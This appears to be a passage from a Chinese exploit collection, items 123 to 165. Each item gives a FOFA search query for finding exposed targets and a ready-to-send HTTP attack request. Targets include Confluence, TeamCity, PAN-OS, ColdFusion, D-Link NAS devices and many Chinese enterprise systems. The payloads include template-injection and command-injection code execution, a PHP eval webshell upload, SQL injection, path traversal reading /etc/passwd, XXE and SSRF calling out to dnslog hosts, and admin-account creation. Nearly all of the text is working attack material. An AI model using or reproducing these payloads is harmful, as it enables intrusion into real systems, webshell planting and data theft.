Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin backend directly; system commands can then be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall (H5 云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun (福建科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin
143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass and template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
